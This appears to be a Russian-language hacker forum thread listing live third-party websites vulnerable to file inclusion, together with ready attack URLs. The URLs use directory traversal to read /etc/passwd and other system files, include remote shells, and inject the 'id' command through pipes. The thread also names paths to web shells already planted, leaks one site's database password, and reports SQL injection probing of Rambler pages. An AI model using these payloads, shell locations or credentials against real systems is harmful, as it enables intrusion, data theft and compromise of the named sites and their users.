http://thor.thunderhaven.net/protection.php?action=logout&siteurl=../../../../../../../../../../../../etc/passwd http://thor.thunderhaven.net/protection.php?action=logout&siteurl=../../../../../../../../../../../../etc/hosts http://thor.thunderhaven.net/protection.php?action=logout&siteurl=../../../../../../../../../../../../etc/ftpusers http://thor.thunderhaven.net/protection.php?action=logout&siteurl=../../../../../../../../../../../../etc/syslog.conf http://thor.thunderhaven.net/protection.php?action=logout&siteurl=../../../../../../../../../../../../etc/services http://thor.thunderhaven.net/protection.php?action=logout&siteurl=../../../../../../../../../../../../etc/group http://thor.thunderhaven.net/protection.php?action=logout&siteurl=../../../../../../../../../../../../etc/bash.bashrc http://thor.thunderhaven.net/protection.php?action=logout&siteurl=../../../../../../../../../../../../etc/profile http://thor.thunderhaven.net/protection.php?action=logout&siteurl=../../../../../../../../../../../../etc/skel/.bashrc Code: http://www.mad-hatter.biz/blink182/protection.php?action=logout&siteurl=[url]
Code: http://www.academic.marist.edu/skiteam/index.php?page=/etc/passwd Не совсем инклуд.. скорее readfile
http://www.specialconnections.ku.edu/cgi-bin/cgiwrap/specconn/print.php?path=../../../../../etc/passwd :\
Code: http://library.gijang.go.kr/design10/user/user/freeboard/view.php?bbs=[url] Code: http://yugioh-usa.com/index.php?page=[url] Code: http://x.consuladodecolombia.com/index.php?doc=[url] Code: http://www.wagi-ewp.pl/index.php?opcja=[url] Code: http://www.vintec-cellar.com/features/index.php?page=[url] Code: http://www.terracapitalpartners.com/index.php?section=[url] Code: http://www.terrorcrew-community.de/index.php?site=[url] Code: http://www.tehnomobil.hr/index.php?s=[url]
Code: http://www.sociologiadip.unimib.it/sociodata/eng/index.php?w=[url] Code: http://www.skysimulations.com/index.php?frame=[url] Code: http://www.sfblackhorsepub.com/index.php?t=[url] Code: http://www.sarawatson.com/index.php?page=[url] Code: http://www.safal.co.za/index.php?Action=[url] Code: http://www.rrpools.ca/index.php?src=[url] Code: http://www.rastyle.com/articles/index.php?id=[url]
Code: http://www.myzimspace.com/index.php?pg=[url] Code: http://www.milewscy.pl/rowery/index.php?strona=[url] Code: http://www.mailboxworld.net/index.php?page=[url]
http://www.unav.es/biblioteca/cgi-bin/archivoperlA.pl?file=|id| http://www.g-m-online.de/cgi-bin/view.pl?file=|id| http://www.superfs.net/infolab-guest/cgi-bin/Jlibssi.pl?file=|id|&obj=message673 http://www.baumann-andre.de/cgi-bin/quoten.pl?filename=|id| http://www.retrojunkies.co.uk/cgi-bin/index.cgi?filename=|id| http://www.aandi.co.jp/cgi-bin/vote/ai/basic/index.cgi?filename=|id|
http://www.pioneer.es/eur/download.jsp?dir=%2Ffiles%2Fbrochures%2F2006%2FHE_EX&filename=../../../../../../../../../etc/passwd&method=attachment
Вот жменька: //------------------------------------------------------------------------------- http://www.empirekosher.com/zip.php?contentpage=/etc/passwd http://www.empirekosher.com/zip.php?contentpage=/tmp/error.php http://www.empirekosher.com/zip.php?contentpage=[shell.from.ftp] http://www.empirekosher.com/zip.php?contentpage=/wwww/htdocs/ (more hosts) acces acces: http://acmedistributinginc.com/log/ http://acmedistributinginc.com/log/error.php (is shell) http://www.aftyouth.com/index.php //------------------------------------------------------------------------------- http://www.potterfan.com/fun.php?pf=[shell].php http://www.potterfan.com/galleries/error.php (is shell) $CONFIG['dbserver'] = 'localhost'; // Your database server $CONFIG['dbuser'] = 'potterfa_galleri'; // Your mysql username $CONFIG['dbpass'] = '356801'; // Your mysql password $CONFIG['dbname'] = 'potterfa_galleries'; // Your mysql database name //------------------------------------------------------------------------------- http://www.invest-telekom.ru/main.php?i=service&d=[shell_url_path]&p=[shell_name].php //------------------------------------------------------------------------------- http://www.eelriver.org/engine.php?bit=../../../../etc/passwd //--------------------------------------------------------------------------------- http://www.emsukraine.com.ua/index2.php3?name=[shell] http://www.emsukraine.com.ua/tmp/error.php (shell) //--------------------------------------------------------------------------------- http://www.energoprom.org.ua/rus.php?inc=[shell].php http://www.energoprom.org.ua/oscom/error.php (shell) ----------------------------------------------------------------------------------- http://www.star-bridge.org/?section=history&subsection=[shell] ----------------------------------------------------------------------------------- http://www.morozov.com.ua/rus/body/video.php?menu=../../../../../etc/passwd ----------------------------------------------------------------------------------- http://www.mobistyle.com.ua/?action=[shell].php ----------------------------------------------------------------------------------- http://credit.koras.com.ua/?[shell] http://credit.koras.com.ua/?/var/www/koras/tmp/error.php (shell) ----------------------------------------------------------------------------------- http://www.td-bm.com.ua/?[shell] ----------------------------------------------------------------------------------- http://www.atp.zp.ua/oborud.php?cmd=viewnews&name=../../../etc/passwd ----------------------------------------------------------------------------------- http://www.feod.com.ua/print.php?/etc/passwd ----------------------------------------------------------------------------------- http://www.vision-ua.com/patient/print.php?[shell] http://www.vision-ua.com/patient/error.php (shell) ----------------------------------------------------------------------------------- http://www.oselya.lviv.ua/jp/notez/index.php?vibor=[shell] ----------------------------------------------------------------------------------- http://www.delight.dn.ua/index.php?go_id=other&url=[shell] ----------------------------------------------------------------------------------- http://www.lbu.kiev.ua/index.php?r=devices&id=[url.html] ----------------------------------------------------------------------------------- http://www.skifiya.com.ua/?ch=[shell].php ----------------------------------------------------------------------------------- http://www.rondo.co.ua/?p=worker_info&link=[shell] ----------------------------------------------------------------------------------- http://www.gashuk.kiev.ua/index.php?id=[shell] ----------------------------------------------------------------------------------- http://www.multydom.crimea.ua/index.php?[shell].php
Code: http://pureweb.fr/helpcenter/module.php?module=osTicket&file=../../../../../../etc/passwd Code: http://chat.uii.net.id/module.php?module=osTicket&file=../../../../../../etc/passwd Code: http://yourcustomerhelpdesk.com/module.php?module=osTicket&file=../../../../../../etc/passwd Code: http://nznetworking.com/module.php?module=osTicket&file=../../../../../../etc/passwd Edit: Code: http://www.tmup-links.org/index.php?page=../../../../../../etc/passwd%00
Вот рамблер на вшивость проверяю иногда, нашол скрипт доступный на скачку, может кому пригодиться: http://orsn.rambler.ru/images/captcha.php (скрипт покамис скачуеться как фаил и можно поглядеть пхп код этого скрипта) ------------------------------------------------------------ Вроде нашол уязвимое место: http://polls.rambler.ru/result.html?rubric=+&id=1262 в параметре rubric если вставить число 150 то выводит страницу, если лешее число то пишет страница ненайдена, пробывал туда мускул запросы сувать - выводит пустую страницу.. Здесь наверно или ниче нет или вывод ошибок перекрыт? ------------------------------------------------------------ Вот еще интересный прикол: http://love.rambler.ru/tips/?tip=Login' Ответ: Внутренняя ошибка сервера Произошла ошибка на стороне сервера. Служба поддержки автоматически проинформирована об этом. Попробуйте повторить операцию через некоторое время. В случае если ошибка повторится, свяжитесь со службой поддержки. ггг ------------------------------------------------------------- Ктото рамблер редактирует: Заходя на http://shop.rambler.ru/ идет переадресация на http://shop.rambler.ru/index.php?root=1 И пишет ошибку: Fatal error: Call to undefined function getMainCatsName() in /var/www/html/fo/ehouse/html/ssi/search_form.php on line 5
